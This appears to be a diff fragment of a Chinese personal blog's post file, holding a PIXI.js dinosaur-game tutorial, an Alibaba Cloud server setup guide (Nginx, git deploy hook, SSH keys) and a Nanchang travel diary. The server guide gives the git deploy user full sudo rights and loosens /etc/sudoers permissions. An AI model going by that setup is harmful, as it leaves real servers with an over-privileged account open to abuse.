    let hintsText = new PIXI.Text("开始游戏", {
    fontSize: 30,
    fill: 0x333333,
    align: "center",
    });
    hintsText.x = app.screen.width / 2;
    hintsText.y = app.screen.height / 2;
    hintsText.anchor.set(0.5);
    container.addChild(hintsText);
    hintsText.interactive = true;
    hintsText.on("click", () => {
    playGame();
    });
hintsText.addEventListener("touchstart", playGame); // 用具名函数注册,后面 removeEventListener 才能真正移除

    ​ 开始游戏的逻辑:

    let isGameing = false;
    let score = 0;
    let jumpVelocity = 1200; // 跳跃初速度,单位:像素/秒
    let gravity = 5000; // 重力加速度,单位:像素/秒^2

    // 开始游戏
    function playGame(e) {
    hintsText.text = "得分:" + score;
    // 恐龙跑步动画;
    runAnimation.x = 60;
    runAnimation.y = window.innerHeight - 50 - frameHeight;
    runAnimation.visible = true;
    // 恐龙死亡动画;
    deadAnimation.x = 60;
    deadAnimation.y = window.innerHeight - 50 - frameHeight;
    deadAnimation.visible = false;
    // 恐龙跳跃精灵
    jumpSprite.x = 60;
    jumpSprite.y = window.innerHeight - 50 - frameHeight;
    jumpSprite.visible = false;

    // 移除开始游戏的点击和触摸事件监听器
    hintsText.interactive = false;
    hintsText.off("click");
    hintsText.removeEventListener('touchstart', playGame);

    // 可以考虑在这里添加一个小延迟再添加跳跃的事件监听器,以避免立即触发跳跃
    setTimeout(() => {
    window.addEventListener("keydown", (e) => {
    if (e.code === "Space") {
    jump();
    }
    });
    app.view.addEventListener('click', jump);
    app.view.addEventListener('touchstart', jump);
    }, 100); // 延迟 100 毫秒添加跳跃事件监听器

    isGameing = true;
    }

    ​ 跳跃逻辑:

    function jump() {
    if (isGameing && !jumpSprite.visible) {
    runAnimation.visible = false;
    jumpSprite.visible = true;
    jumpVelocity = 1200; // 确保每次跳跃前都重置了跳跃速度
    }
    }
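
​ 粗略估算一下这组参数:最大跳跃高度约为 v₀²/(2g) = 1200² / (2 × 5000) = 144 像素,滞空时间约为 2v₀/g = 2 × 1200 / 5000 = 0.48 秒,调手感时可以按这两个量来改初速度和重力。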

    ​ 实时控制游戏逻辑:

    app.ticker.add((delta) => {
    if (isGameing) {
    hintsText.text = "得分:" + score;
    // 获取自上一帧以来的秒数
    let deltaTime = app.ticker.deltaMS / 1000;
    // 计算基于时间的移动距离
    const groundSpeed = 1000 * deltaTime * Math.log10(10 + score);
    const cactusSpeed = groundSpeed;
    // 地面精灵
    groundSprite.tilePosition.x -= groundSpeed;
    // 仙人掌精灵
    cactusSprite.x -= cactusSpeed;

    if (cactusSprite.x <= -30) {
    cactusSprite.x = getRandomInt(window.innerWidth, window.innerWidth * 2);
    score++;
    }

    if (jumpSprite.visible) {
    // 根据deltaTime调整跳跃速度和重力
    jumpVelocity -= gravity * deltaTime; // 跳跃速度随时间减小
    jumpSprite.y -= jumpVelocity * deltaTime; // 根据跳跃速度更新位置

    // 检查是否落地
    if (jumpSprite.y >= window.innerHeight - 50 - frameHeight) {
    console.log("跳跃结束");
    jumpSprite.y = window.innerHeight - 50 - frameHeight; // 确保不会穿过地面
    runAnimation.visible = true;
    jumpSprite.visible = false;
    }
    }

    // 判断跳跃精灵与仙人掌精灵是否碰撞
    if (
    jumpSprite.y > cactusSprite.y - 60 &&
    jumpSprite.x + 60 > cactusSprite.x &&
    jumpSprite.x - 60 < cactusSprite.x
    ) {
    // 游戏结束
    gameOver();
    }
    } else {
    return;
    }
    });
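
​ 上面的碰撞判断是用固定的 60 像素粗略估算的;一个更通用的思路是取两个精灵的包围盒做矩形相交(AABB)检测。下面是一个示意(非原教程代码):

// 示意:用 getBounds() 的包围盒做 AABB 相交检测
function hitTest(a, b) {
const r1 = a.getBounds();
const r2 = b.getBounds();
return (
r1.x < r2.x + r2.width &&
r1.x + r1.width > r2.x &&
r1.y < r2.y + r2.height &&
r1.y + r1.height > r2.y
);
}
// 用法:if (hitTest(jumpSprite, cactusSprite)) gameOver();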

    ​ 游戏结束逻辑:

    function gameOver() {
    console.log("游戏结束");
    // 游戏结束
    isGameing = false;
    deadAnimation.visible = true;
    runAnimation.visible = false;
    jumpSprite.visible = false;
    hintsText.text = "游戏结束,最后得分:" + score;
    hintsText.interactive = true;
    hintsText.on("click", () => {
    location.reload();
    });
    hintsText.addEventListener('touchstart', function (event) {
    location.reload();
    });
    }

    演示(emmm 手机上玩起来适配还不是很好……)

    ]]>
    @@ -3252,7 +3252,7 @@ /posts/Server-%E9%98%BF%E9%87%8C%E4%BA%91%20ECS/ - 正文

    白嫖服务器!

    ​ 去下面这个链接领一个 3 个月的学生服务器:

    白嫖服务器

    MobaXterm 连接服务器

    ​ 在服务器控制台中设置远程连接:

    重置连接

    ​ 重置连接密码:

    重置密码

    ​ MobaXterm 下设置好对应的公网 IP,以 root 用户连接:

    设置连接参数

    ​ 输好密码,成功连接!

    开冲!

    Nginx

    安装 Nginx

​ 下面的操作基本按照这个链接来做:

    ​ 新建一个文件夹并转到该目录 /usr/local/nginx 下以存放 nginx:

    mkdir /usr/local/nginx
    cd /usr/local/nginx

    ​ 从 nginx: download 里下载一个 nginx,这里是 nginx-1.24.0.tar.gz,上传到服务器并解压:

    tar -xvf nginx-1.24.0.tar.gz

    解压 nginx

    ​ 转到这个文件夹 /usr/local/nginx/nginx-1.24.0/ 下:

    cd /usr/local/nginx/nginx-1.24.0/

    ​ 安装 nginx:

    yum -y install gcc zlib zlib-devel pcre-devel openssl openssl-devel
    ./configure --with-http_stub_status_module --with-http_ssl_module
    make
    make install

    ​ 启动 Nginx:

    cd /usr/local/nginx/sbin
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 查看 Nginx 是否启动成功(这个进程是否在运行):

    ps -ef | grep nginx

    查看是否在运行

Nginx 相关命令:

    • 重新加载 nginx 配置文件并重启 nginx:
    ./nginx -s reload
    • 启动 nginx:
    ./nginx
    • 强制停止 nginx:
    ./nginx -s stop
    • 优雅的停止 nginx:
    ./nginx -s quit
    • 查看 nginx 的版本:
    nginx -v
    • 杀死所有 nginx 进程:
    killall nginx
    • 查看 nginx 是否启动:
ps -ef | grep nginx

    开放 80 端口

​ 查看防火墙状态并放行 80 端口:

    systemctl status firewalld
    firewall-cmd --zone=public --add-port=80/tcp --permanent
    firewall-cmd --reload

    ​ 阿里云控制台下,设置 安全组 让任何 IP 都可访问 80 端口。

    设置端口

    开跑!

    ​ 浏览器下输入服务器公网 IP(124.41.23.XXX):

    访问网页

配置 Nginx 指向的页面(如果要用 git,这章可跳过)

    ​ 新建一个文件夹以存放静态网页的页面:

    cd /
    mkdir work
    cd /work
    mkdir statics

    ​ 将静态网页的资源传到这个文件夹下:

    传送资源

​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location 和 404 页面换成自己的):

    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /work/statics/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /work/statics/;
    }

    ...

​ 重启 Nginx 服务:

    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 进服务器公网 IP(124.41.23.XXX)查看页面及 404 页面是否有效。

    git

    安装 git

    ​ 安装 git:

    yum install git

    ​ 添加一个账户 git,用于控制推送:

    useradd git

    ​ 给这个 git 账户加点权限:

    chmod 740 /etc/sudoers
    vim /etc/sudoers

    ​ 添加:

    git        ALL=(ALL)     ALL

    加权限

    ​在插入模式下按下 Ctrl + O,然后输入 :wq 并按下回车键,vim 将保存文件并退出。

​ 给 git 账户设置密码:

passwd git

    git 账户

    • 为本地的 hexo_blog 配置一个部署静态文件的远程仓库。

    ​ 创建私有 Git 仓库,在 /var/repo/ 下,创建一个名为 hexo_static 的裸仓库(bare repo)
    ​ 如果没有 /var/repo 目录,需要先创建;然后修改目录的所有权和用户权限,之后 git 用户都具备 /var/repo 目录下所有新生成的目录和文件的权限。

    ​ 此时为 root 用户登录:

    mkdir /var/repo/
    chown -R git:git /var/repo/
    chmod -R 755 /var/repo/
    cd /var/repo/
    git init --bare hexo_static.git
    • 创建 /var/www/hexo 目录,用于 Nginx 托管(即,这个文件夹将存放静态网页的全部文件)。
    mkdir -p /var/www/hexo

    ​ 加点权限:

    chown -R git:git /var/www/hexo
    chmod -R 755 /var/www/hexo

​ 进 /usr/local/nginx/conf/,编辑 nginx.conf,修改 http{} 里的 server 属性(将 location 和 404 页面的 root 换成 /var/www/hexo/):

    server {
    listen 80;
    server_name localhost;

    #charset koi8-r;

    #access_log logs/host.access.log main;

    location / {
    root /var/www/hexo/;
    index index.html index.htm;
    }

    error_page 404 /404.html;
    location = /404.html {
    root /var/www/hexo/;
    }

    ...

​ 重启 Nginx 服务:

    cd /usr/local/nginx/sbin
    ./nginx -s quit
    /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
    ./nginx -s reload

    ​ 接下来,在云服务器上的裸仓库 hexo_static 创建一个钩子,在满足特定条件时将静态 HTML 文件传送到 Web 服务器的目录下,即 /var/www/hexo

    ​ 在自动生成的 hooks 目录下创建一个新的钩子文件:

    vim /var/repo/hexo_static.git/hooks/post-receive

    ​ 往里面添加:

    #!/bin/bash
    git --work-tree=/var/www/hexo --git-dir=/var/repo/hexo_static.git checkout -f

    配置钩子

    ​ 保存并退出文件,并让该文件变为可执行文件。

    chmod +x /var/repo/hexo_static.git/hooks/post-receive

    hexo 推送到 git

    ​ 在 hexo 项目的 _config.yml 中,设置部署到服务器上:

    账户@服务器 IP:推送地址

    这是多部署!
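
​ 部署地址原文是截图;按 hexo-deployer-git 的常见写法,deploy 配置大致长下面这样(示意:IP 沿用前文的占位地址,仓库路径即上面建的裸仓库,branch 按默认 master 假设):

# _config.yml(示意)
deploy:
  type: git
  repo: git@124.41.23.XXX:/var/repo/hexo_static.git
  branch: master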

    ​ 开始推送!

    hexo d

    ​ 非常不幸地,这个网址会因为不使用 HTTPS 而导致加密插件失效……


    SSH 免密登录与 git 推送

    ​ 这样推送会要你输入密码,接下来尝试在本地建立 SSH 信任关系以实现免密登录!

    ​ MobaXterm 下 root 账户打开 RSA 认证:

    vim /etc/ssh/sshd_config

    ​ 最下方添加几行:

    RSAAuthentication yes
    PubkeyAuthentication yes
    AuthorizedKeysFile .ssh/authorized_keys

    加几行!

    ​ 配置 SSH:

    su git
    mkdir /home/git/.ssh
    vim /home/git/.ssh/authorized_keys

    ​ 将 Windows 下 C:/用户/用户名/.ssh/id_rsa.pub 下的内容:

    id_rsa.pub

    ​ 拷贝到服务器的 /home/git/.ssh/authorized_keys 中:

    配置 SSH

    ​ 给这个文件一点权限:

    chmod 600 /home/git/.ssh/authorized_keys
    chmod 700 /home/git/.ssh/
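
​ 手动拷贝公钥容易出错;如果本地环境带有 ssh-copy-id(Git Bash、WSL 一般都有),也可以在本机一条命令完成(示意,IP 为下文的占位地址):

ssh-copy-id git@121.41.23.XXX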

    ​ 此时本机上命令(尝试以 git 账户登录服务器):

    ssh git@121.41.23.XXX

    ​ 登录便不需要密码!hexo d 命令同理。

    免密登录!

    设置域名

    购买域名!

    ​ 买一个域名!

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    完成域名解析!

    ​ 添加域名解析,将记录值设置为所购买的服务器所提供的公网 IP:

    添加域名解析

    ​ 过段时间进自己的二级域名(www.gz-metal-cell.top)就会获得与进服务器公网 IP (124.41.23.XXX) 一样的效果!

Nginx

​ 但是如果设置好了 Nginx 页面的话,就会要你备案后才能使用了……(免费的服务器不让你备案呜呜呜)

    给我备案!

    ]]>
    @@ -3337,7 +3337,7 @@ /posts/Diary-%E8%B5%A3%E4%BA%86%EF%BC%8C%E5%8F%88%E5%8F%88%E9%97%BD%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 前言
            

    正文

    买票

    ​ 这次回家决定中转一次南昌,和伟哥商量完后觉得买卧铺比较合适,躺一晚上就到了,价格还比较便宜🤔。

    车票

    ​ 伟哥对南昌没有兴趣捏,自己定一个单人间,看一看南昌还有个叫福州路的地方,而且还是市中心?¥132.30,整!

    住宿

    1.19

    14:38 保定站

    保定站

    ​ 中午买好三明治和饭团,14:00 出发前往保定站,在冀 F 的生活要告一段落了。

    14:56 候车

    候车中

    ​ 车次信息:T167

站名 进站时间
保定 15:26
石家庄 17:01
邯郸 18:33
安阳 19:22
新乡 20:24
郑州 21:19
漯河 22:45
信阳 00:15
武昌 03:03
黄石 04:41
阳新 05:12
瑞昌 05:56
南昌 07:27

    ​ 研究了一下这车次还蛮浪漫的,21:00 过黄河,0:00 过淮河,3:00 过长江,1.19 我还是北方人,1.20 我就是南方人了😎!

    15:38 再见冀 F!

    👋

    ​ 绿皮火车的进站到发车时间还挺短,进来以后发现车厢在后面,走过去结果响铃了😅,最后大包小包一阵跑才上了车。

    15:45 烟火气

    车厢内

    ​ 幸好保定站离始发站近,进来以后卧铺旁边还有椅子可以坐😍。

    15:46 中国保定

    某桥

    ​ 从南边逐渐离开了中国保定。

    16:52 石家庄

槐安桥

    ​ 石家庄槐安桥。

    17:23 零食 Party

    开吃!

    ​ 跟伟哥吃零食唠嗑打发时间。期间还玩起了成语接龙和写同音字的游戏,美丽泉州哥口音不标准是有原因的,他连拼音都没搞清楚😇。

    18:33 邯郸

    夜幕降临

    ​ 天色渐晚,还是没得出河北😇。窗外的风景逐渐看不见了。

    21:06 郑州

    郑州

    ​ 聊着聊着没注意啥时候过了黄河😅。

    ​ 列车员说 22:00 熄灯,我们 21:30 就开躺了。

    太窄了这床
    而且这车也太抖了
    确实啊
    可恶
    凑合着睡吧
    晚安伟哥

    ​ 好久没体验过卧铺了,真是挤啊😅,而且这车况且况且的,注定是一个不眠夜了。

    1.20

    02:39 武汉长江大桥

    武汉长江大桥

    ​ 也不知道睡着了没,半睡半醒的,拿起手机发现即将过了长江。

    我现在应该离小迷糊挺远的

    07:17 南昌

    某桥

    ​ 最后况且况且到 6:00 彻底醒了,索性就下来看看风景了,窗外已不是一片白茫茫,而是绿树成荫。这就是南方!

    ​ 比起河北一片大空地,窗外有些建筑还有些江南水乡的感觉。

    07:29 南昌站

    南昌站

    ​ 下车!

    真爽

    07:45 美丽泉州哥

    合影!

    ​ 一路下来已经臭烘烘了,干净又卫生啊😅。

    ​ 来跟伟哥合个影。

    07:56 福州路

    南昌著名夜店一条街

​ 伟哥在南昌西站下车,我在福州路提前下车,临走前说了和 22 年 11 月一样的话“明年见”🫠。

    到福州了🐶

    ​ 福州在南昌的地位还挺高?福州路不仅在市中心,而且还有专门以此命名的地铁站。我想一些地方给道路命名为其它城市的名字,是想给一些在外地的游子一些家的感觉吧。

    08:06 江西宾馆

    江西宾馆

    ​ 房东阿姨允许我提前入住,蛮好。订的民宿在江西宾馆宿舍里,还找了老半天。

    08:19 放置行李

    开躺!

    ​ OK 行李一扔,准备去外面吃个早餐,怕背的《滕王阁序》忘记了,决定直扑滕王阁!

    ​ 感觉这个房东阿姨还比较热情友善,还让她帮忙推荐了一下哪里可以吃早餐😇。

    那你可以到八一公园正对面的一个早餐店
    搜索上营坊街
    走路过去七八分钟
    进上营坊街的第一家店就是
    吃完可以顺道逛一下八一公园,从公园里绕出去中山路
    也可以吃完从公园里过去打卡佑民寺

    09:08 赣面

    赣面 + 瓦罐汤

    ​ 整了一份南昌拌面 + 瓦罐汤,only ¥9。这个南昌拌面比热干面还便宜一块钱?比沙县拌面便宜两块钱,好评啊😍!

    ​ 来南昌前总是很害怕被辣到,结果发现这个赣面的辣度完全在可接受的范围内。

    09:20 八一公园

    八一公园

    ​ 也是一个给老同志休闲的公园,这里的人跟保定人比起来,太“娇小”了😇。

    八一公园 八一公园 八一公园

    ​ 明显感受到这里的空气比保定好多了😍。

    妈的 空气清新多了
    哈哈哈我还没呼吸外面的空气
    要么在地铁
    要么在车站内
    太舒服了

    09:56 八一纪念馆大门

    ​ 南昌八一起义纪念馆是为纪念南昌起义而设立的专题纪念馆,成立于 1956 年,1959 年 10 月 1 日正式对外开放。南昌八一起义纪念馆位于江西省南昌市中山路 380 号,占地面积 5903 平方米。
    ​ 南昌八一起义纪念馆基本陈列陈展各类图片、图表 509 幅,文物展品 407 件(套),艺术品 51 件;陈展内容主要有:新馆大楼南昌起义、人民军队光辉历程以及旧址复原陈列等。
    ​ 南昌八一起义纪念馆是全国文明单位、国家一级博物馆、国家 AAAA 级旅游景区、全国红色旅游工作先进集体、全国首批“爱国主义教育示范基地” 。

    八一纪念馆

    ​ 腿去滕王阁的路上整了杯瑞幸,然后又看到了八一纪念馆,于是我改变主意了。

    纪念馆

    ​ 这个纪念馆里有两个主要建筑:一个江西大旅社(八一起义指挥部旧址)和一个另建的纪念馆。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 与南昌起义有关的人物。

    10:04 江西大旅社

    八一起义指挥部旧址

    ​ 拍一张大旅社正门,进去逛逛。

    八一纪念馆 八一纪念馆 八一纪念馆

​ 里面有许多设施试图还原当时的场景。还有一个大概小学生年纪的小孩在做讲解,天呐😮。虽然我觉得这个小孩是死记硬背的……他说是“汪蒋”先后发动了反革命政变,这人物顺序应该是说反了。

    10:21 八一纪念馆

    联欢大会

    ​ 去参观参观旁边的纪念馆,人挤人🫠。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 八路军当时用过的各种装备。

    10:23 朱德元帅

    朱德元帅

    10:35 万寿宫

    ​ 南昌万寿宫,又称妙济万寿宫,俗称“铁柱宫”,知名中国道教庙宇。坐落于江西省南昌广润门内侧的翠花街上。该地段是今日南昌生意繁荣的商城之一。

    万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫

    ​ 八一纪念馆旁边就是万寿宫,逛一逛。

    ​ 笑死,经典三坊七巷。

    10:38 南昌大饭店

    代表南昌,宴请八方

    ​ 据说这个南昌大饭店,早来的话进去背《滕王阁序》可以白嫖一份霸王餐🤔。

    10:50 府河北路

    滕王阁

    ​ 腿到了江边,江南三大名楼之首出现了!

    11:02 背诵机

    一阵乱背

    ​ 背诵完《滕王阁序》就可以白嫖进滕王阁,准备了两周的我肯定要去试试🤗!

    ​ 有可能是现场背诵有点紧张,再加上卧铺躺得我晕乎乎的,背得十分卡壳,但是最后还是拿下!

    ​ 看样子会背《滕王阁序》的人还是少,大多数人还是选择花钱进滕王阁。

    ​ 这个背诵机器感觉还是有些傻乎乎的,有些字糊着糊着也就混过去了。

    ​ 站在最后边还可以偷偷看前面背的啥,趁机读一段😇,结果我前面的那个没背下来,我拿下了。

    ​ 背完后身份证就会有记录,就可以刷身份证进去了。

    11:08 滕王阁

    台隍枕夷夏之交,宾主尽东南之美

​ 滕王阁坐落于南昌市西北,赣江东岸。始建于唐永徽四年。为当时任洪州都督的唐高祖李渊之子李元婴所建。据记载,李元婴于永徽三年迁任苏州刺史,调任洪州都督时建此阁以为别居。由于李元婴封号为“滕王”,故名滕王阁。20 多年后,当时的洪州都督阎公首次重修。竣工后,阎公聚集文人雅士作文记事,途经于此的王勃就是于此时写下了其代表名篇《滕王阁序》。并由此令滕王阁名扬四海。韩愈在《新修滕王阁记》中赞道:“愈少时则闻江南多临观之美,而滕王阁独为第一,有‘瑰伟绝特’之称。”清代诗人尚镕《忆滕王阁》诗云:“天下好山水,必有楼台收。山水与楼台,又须文字留。”

    ​ 开始登楼!

    ​ 楼下有一个买纪念品的商店,撒了点币,相当于把门票钱拿去买纪念品了🤧。

    11:14 八一大桥

    八一大桥

    ​ 八一大桥是江西省南昌市主要桥梁之一,连接赣江东岸东湖区的阳明路和沿江北大道及西岸红谷滩新区的庐山南大道,桥面双向四车道(不含两条非机动车道),是南昌交通纽带和标志性建筑。

    ​ 楼上的风可真大啊!冷死我了😭。

    11:26 滕王高阁临江渚

    槛外长江空自流
    槛外长江空自流

​ 怕手机被风吹走,只好在离窗台稍微远一点的地方拉一个全景🫠。

    11:26 物华天宝,龙光射牛斗之虚

    滕王阁 滕王阁 滕王阁

    ​ 阁中充满了《滕王阁序》的元素,还摆着许多“宝贝”,仔细看感觉挺假🥸。

    11:35 登顶

    画栋朝飞南浦云

    ​ 这个阁的楼梯十分狭窄,人还多,我怀疑有点安全隐患🤧。

    ​ 登上了滕王阁阳台的顶楼!

物换星移几度秋
物换星移几度秋

    ​ 拉一个全景。

    12:01 出!

    披绣闼,俯雕甍

    ​ 这时候人已经有点疲惫了,看攻略觉得南昌晚上比较好玩,于是决定回民宿睡个午觉。

    12:25 江西美术馆

    红彤彤

    ​ 中转地铁途中打卡一下江西美术馆。

    12:27 八一起义纪念塔

    八一

    ​ 中转地铁途中打卡一下八一起义纪念塔。

    江西美术馆

    ​ 在纪念碑底下拍美术馆。

    12:40 福州路

    FUZHOU RD

    ​ 回民宿开躺!

    ]]>
    + 前言
            

    正文

    买票

    ​ 这次回家决定中转一次南昌,和伟哥商量完后觉得买卧铺比较合适,躺一晚上就到了,价格还比较便宜🤔。

    车票

    ​ 伟哥对南昌没有兴趣捏,自己定一个单人间,看一看南昌还有个叫福州路的地方,而且还是市中心?¥132.30,整!

    住宿

    1.19

    14:38 保定站

    保定站

    ​ 中午买好三明治和饭团,14:00 出发前往保定站,在冀 F 的生活要告一段落了。

    14:56 候车

    候车中

    ​ 车次信息:T167

    站名进站时间
    保定15:26
    石家庄17:01
    邯郸18:33
    安阳19:22
    新乡20:24
    郑州21:19
    漯河22:45
    信阳00:15
    武昌03:03
    黄石04:41
    阳新05:12
    瑞昌05:56
    南昌07:27

    ​ 研究了一下这车次还蛮浪漫的,21:00 过黄河,0:00 过淮河,3:00 过长江,1.19 我还是北方人,1.20 我就是南方人了😎!

    15:38 再见冀 F!

    👋

    ​ 绿皮火车的进站到发车时间还挺短,进来以后发现车厢在后面,走过去结果响铃了😅,最后大包小包一阵跑才上了车。

    15:45 烟火气

    车厢内

    ​ 幸好保定站离始发站近,进来以后卧铺旁边还有椅子可以坐😍。

    15:46 中国保定

    某桥

    ​ 从南边逐渐离开了中国保定。

    16:52 石家庄

    淮安桥

    ​ 石家庄槐安桥。

    17:23 零食 Party

    开吃!

    ​ 跟伟哥吃零食唠嗑打发时间。期间还玩起了成语接龙和写同音字的游戏,美丽泉州哥口音不标准是有原因的,他连拼音都没搞清楚😇。

    18:33 邯郸

    夜幕降临

    ​ 天色渐晚,还是没得出河北😇。窗外的风景逐渐看不见了。

    21:06 郑州

    郑州

    ​ 聊着聊着没注意啥时候过了黄河😅。

    ​ 列车员说 22:00 熄灯,我们 21:30 就开躺了。

    太窄了这床
    而且这车也太抖了
    确实啊
    可恶
    凑合着睡吧
    晚安伟哥

    ​ 好久没体验过卧铺了,真是挤啊😅,而且这车况且况且的,注定是一个不眠夜了。

    1.20

    02:39 武汉长江大桥

    武汉长江大桥

​ 也不知道睡着了没,半睡半醒的,拿起手机一看,马上就要过长江了。

    我现在应该离小迷糊挺远的

    07:17 南昌

    某桥

    ​ 最后况且况且到 6:00 彻底醒了,索性就下来看看风景了,窗外已不是一片白茫茫,而是绿树成荫。这就是南方!

    ​ 比起河北一片大空地,窗外有些建筑还有些江南水乡的感觉。

    07:29 南昌站

    南昌站

    ​ 下车!

    真爽

    07:45 美丽泉州哥

    合影!

    ​ 一路下来已经臭烘烘了,干净又卫生啊😅。

    ​ 来跟伟哥合个影。

    07:56 福州路

    南昌著名夜店一条街

​ 伟哥在南昌西站下车,我在福州路提前下车,临走前说了和 22 年 11 月时一样的话:“明年见”🫠。

    到福州了🐶

​ 福州在南昌的地位还挺高?福州路不仅在市中心,而且还有专门以此命名的地铁站。我想,一些地方用其它城市的名字给道路命名,大概是想给在外地的游子一点家的感觉吧。

    08:06 江西宾馆

    江西宾馆

    ​ 房东阿姨允许我提前入住,蛮好。订的民宿在江西宾馆宿舍里,还找了老半天。

    08:19 放置行李

    开躺!

    ​ OK 行李一扔,准备去外面吃个早餐,怕背的《滕王阁序》忘记了,决定直扑滕王阁!

    ​ 感觉这个房东阿姨还比较热情友善,还让她帮忙推荐了一下哪里可以吃早餐😇。

    那你可以到八一公园正对面的一个早餐店
    搜索上营坊街
    走路过去七八分钟
    进上营坊街的第一家店就是
    吃完可以顺道逛一下八一公园,从公园里绕出去中山路
    也可以吃完从公园里过去打卡佑民寺

    09:08 赣面

    赣面 + 瓦罐汤

    ​ 整了一份南昌拌面 + 瓦罐汤,only ¥9。这个南昌拌面比热干面还便宜一块钱?比沙县拌面便宜两块钱,好评啊😍!

    ​ 来南昌前总是很害怕被辣到,结果发现这个赣面的辣度完全在可接受的范围内。

    09:20 八一公园

    八一公园

    ​ 也是一个给老同志休闲的公园,这里的人跟保定人比起来,太“娇小”了😇。

    八一公园 八一公园 八一公园

    ​ 明显感受到这里的空气比保定好多了😍。

    妈的 空气清新多了
    哈哈哈我还没呼吸外面的空气
    要么在地铁
    要么在车站内
    太舒服了

    09:56 八一纪念馆大门

    ​ 南昌八一起义纪念馆是为纪念南昌起义而设立的专题纪念馆,成立于 1956 年,1959 年 10 月 1 日正式对外开放。南昌八一起义纪念馆位于江西省南昌市中山路 380 号,占地面积 5903 平方米。
    ​ 南昌八一起义纪念馆基本陈列陈展各类图片、图表 509 幅,文物展品 407 件(套),艺术品 51 件;陈展内容主要有:新馆大楼南昌起义、人民军队光辉历程以及旧址复原陈列等。
    ​ 南昌八一起义纪念馆是全国文明单位、国家一级博物馆、国家 AAAA 级旅游景区、全国红色旅游工作先进集体、全国首批“爱国主义教育示范基地” 。

    八一纪念馆

    ​ 腿去滕王阁的路上整了杯瑞幸,然后又看到了八一纪念馆,于是我改变主意了。

    纪念馆

    ​ 这个纪念馆里有两个主要建筑:一个江西大旅社(八一起义指挥部旧址)和一个另建的纪念馆。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 与南昌起义有关的人物。

    10:04 江西大旅社

    八一起义指挥部旧址

    ​ 拍一张大旅社正门,进去逛逛。

    八一纪念馆 八一纪念馆 八一纪念馆

​ 里面有许多设施,试图还原当时的场景。还有一个大概小学生年纪的小孩在做讲解,天呐😮。虽然我觉得这个小孩是死记硬背的……他说是“汪蒋”先后发动了反革命政变,这人物顺序应该是说反了。

    10:21 八一纪念馆

    联欢大会

    ​ 去参观参观旁边的纪念馆,人挤人🫠。

    八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆 八一纪念馆

    ​ 八路军当时用过的各种装备。

    10:23 朱德元帅

    朱德元帅

    10:35 万寿宫

    ​ 南昌万寿宫,又称妙济万寿宫,俗称“铁柱宫”,知名中国道教庙宇。坐落于江西省南昌广润门内侧的翠花街上。该地段是今日南昌生意繁荣的商城之一。

    万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫 万寿宫

    ​ 八一纪念馆旁边就是万寿宫,逛一逛。

    ​ 笑死,经典三坊七巷。

    10:38 南昌大饭店

    代表南昌,宴请八方

    ​ 据说这个南昌大饭店,早来的话进去背《滕王阁序》可以白嫖一份霸王餐🤔。

    10:50 府河北路

    滕王阁

    ​ 腿到了江边,江南三大名楼之首出现了!

    11:02 背诵机

    一阵乱背

    ​ 背诵完《滕王阁序》就可以白嫖进滕王阁,准备了两周的我肯定要去试试🤗!

    ​ 有可能是现场背诵有点紧张,再加上卧铺躺得我晕乎乎的,背得十分卡壳,但是最后还是拿下!

    ​ 看样子会背《滕王阁序》的人还是少,大多数人还是选择花钱进滕王阁。

    ​ 这个背诵机器感觉还是有些傻乎乎的,有些字糊着糊着也就混过去了。

    ​ 站在最后边还可以偷偷看前面背的啥,趁机读一段😇,结果我前面的那个没背下来,我拿下了。

    ​ 背完后身份证就会有记录,就可以刷身份证进去了。

    11:08 滕王阁

    台隍枕夷夏之交,宾主尽东南之美

​ 滕王阁坐落于南昌市西北,赣江东岸。始建于唐永徽四年。为当时任洪州都督的唐高祖李渊之子李元婴所建。据记载,李元婴于永徽三年迁任苏州刺史,调任洪州都督时建此阁以为别居。由于李元婴封号为“滕王”,故名滕王阁。20 多年后,当时的洪州都督阎公首次重修。竣工后,阎公聚集文人雅士作文记事,途经于此的王勃就是于此时写下了其代表名篇《滕王阁序》。并由此令滕王阁名扬四海。韩愈在《新修滕王阁记》中赞道:“愈少时则闻江南多临观之美,而滕王阁独为第一,有‘瑰伟绝特’之称。”清代诗人尚镕《忆滕王阁》诗云:“天下好山水,必有楼台收。山水与楼台,又须文字留。”

    ​ 开始登楼!

    ​ 楼下有一个买纪念品的商店,撒了点币,相当于把门票钱拿去买纪念品了🤧。

    11:14 八一大桥

    八一大桥

    ​ 八一大桥是江西省南昌市主要桥梁之一,连接赣江东岸东湖区的阳明路和沿江北大道及西岸红谷滩新区的庐山南大道,桥面双向四车道(不含两条非机动车道),是南昌交通纽带和标志性建筑。

    ​ 楼上的风可真大啊!冷死我了😭。

    11:26 滕王高阁临江渚

    槛外长江空自流
    槛外长江空自流

​ 怕手机被风吹走,只好在离窗台稍微远一点的地方拉一个全景🫠。

    11:26 物华天宝,龙光射牛斗之虚

    滕王阁 滕王阁 滕王阁

    ​ 阁中充满了《滕王阁序》的元素,还摆着许多“宝贝”,仔细看感觉挺假🥸。

    11:35 登顶

    画栋朝飞南浦云

    ​ 这个阁的楼梯十分狭窄,人还多,我怀疑有点安全隐患🤧。

    ​ 登上了滕王阁阳台的顶楼!

物换星移几度秋
物换星移几度秋

    ​ 拉一个全景。

    12:01 出!

    披绣闼,俯雕甍

